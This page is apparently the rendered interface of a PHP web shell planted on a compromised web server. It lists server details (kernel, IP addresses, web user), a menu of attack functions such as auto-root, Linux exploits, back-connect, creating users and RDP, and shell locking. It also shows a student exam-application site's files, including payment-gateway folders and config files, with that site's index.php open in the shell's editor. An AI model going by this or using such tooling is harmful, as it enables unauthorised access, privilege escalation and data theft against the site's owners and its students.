Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.147.82.108
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
vskub /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jquery-ui-1.9
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
adds.jpg
39.03
KB
-rwxr-xr-x
adds1.jpg
293.14
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
candidate_list.html
5.41
KB
-rwxr-xr-x
cconfig.php
1.16
KB
-rwxr-xr-x
cconfig_old.php
1.12
KB
-rwxr-xr-x
consts.php
227
B
-rwxr-xr-x
database.php
232
B
-rwxr-xr-x
index.php
4.44
KB
-rwxr-xr-x
index_11112017.php
3.96
KB
-rwxr-xr-x
pgResponse.php
13.89
KB
-rwxr-xr-x
student.php
6.43
KB
-rwxr-xr-x
verify.php
13.47
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" /> <?php require_once("links/js_files.php");?> <script type="text/javascript"> $(function(){ if (location.protocol !== 'https:') { location.replace(`https:${location.href.substring(location.protocol.length)}`); } $('.index_label_div').corner("5px").css("border","1px solid #6F6868"); $('.messageboard-div').corner("5px").css("border","1px solid #6F6868"); $('.reg_no_div').corner("bl br").css("border","1px solid #6F6868"); $('#main_message_board').corner("bl br").css("border","1px solid #2596CE"); $('.submit_div_button').corner("5px"); $('.div_app_form_center_blue').corner("tl tr"); $('.div_app_form_center_black').corner("tl tr"); $('#print_app_form').corner("5px"); PopulateCategoryList(); }); function dologin(event) { if (event.keyCode == 13) ValidateRegNo(); } </script> </head> <body> <div id='main_frame'> <div class='header_main_div'> <?php require_once("links/header.php");?> <!-- <a href="http://www.logisys.net.in/msreg" target='_blank'><img src="adds1.jpg" style = "float:right;margin-right:-130px;margin-top:-12%" width = '12%;' height = "500px;" ></a> --> <div id='main_page_div'> <div id="index_main_page"> <div style="height:28px; padding:2px;" align='center' class="div_app_form_center_blue"> <a style='font-family:Arial, Trebuchet MS;word-spacing: 4px;text-decoration:none; color:#FFFFFF;padding: 8px 0 0 8px;'>Online Examination Application Form </a> </div> <div id='main_message_board'style="height:411px;"> </div> </div> <div id="index_main_page_right" onkeydown="dologin(event)"> <div style="height:28px; padding:2px;margin-left:6px; margin-right: 5px;" align='center' class="div_app_form_center_black"> <a style='font-family:Trebuchet MS;word-spacing: 4px;text-decoration:none; color:#FFFFFF;padding: 5px 0 0 68px;'>Student Details</a> </div> <div class='reg_no_div' style="height:183px; padding:2px;margin-left:6px; margin-right: 5px;"> <div id="hTabTopmainEach"> <b>Register / Roll No. : </b> <input tabindex=1 type="text" value='' id='reg_no' style="height:19px;width:220px;font-family: Arial; padding-left: 3px; border: 1px solid #8B8B8B; font-size: 13px; color: #000000;" onfocus="if(this.value=='') this.value=''" onblur="if(this.value=='') this.value=''" maxlength="10" value="" > </div><?php @session_start(); $FUNIV = $_SESSION['FUNIVCODE']; if($FUNIV != '018') { ?> <!-- <div id="hTabTopmainEach" style = 'display:'> <b>Category : </b> <select tabindex=2 style="height:22px;width:225px;border: 1px solid #8B8B8B;" id="category" name="category"> </select> </div> --> <!-- <div id="hTabTopmainEach" style = 'display:'> <b>Fee Type : </b> <select tabindex=2 style="height:22px;width:225px;border: 1px solid #8B8B8B;" id="FCONSTYPE" name="FCONSTYPE"> </select> </div> --> <?php } ?> <div id="hTabTopmainEach"> <div style="background: none repeat scroll 0 0 #EECF02; border-radius: 5px 5px 5px 5px; box-shadow: 1px 1px 5px #888888; float: right; height: 22px; margin-right: 22px; padding-left: 8px; width: 42px;" id="print_app_form"> <span tabindex=3 onclick="ValidateRegNo();" style="margin-left:8px;cursor: pointer; line-height: 19px;font-size:14px;font-weight:bold;">Go</span> </div> </div> </div> <div style="height:28px; padding:2px;margin-left:6px; margin-right: 5px;margin-top:20px;" align='center' class="div_app_form_center_black"> <a style='font-family:Trebuchet MS;word-spacing: 4px;text-decoration:none; color:#FFFFFF;padding: 5px 0 0 69px;'>Announcements</a> </div> <div class='reg_no_div' style="height:auto;min-height:164px; padding:2px;margin-left:6px; margin-bottom: 6px;margin-right: 5px;" id='message_board'> <b>For any clarifications on exam application form, kindly contact your college</b> </div> </div> </div> <?php require_once("links/footer.php");?> </div> </div> </body> </html>
Close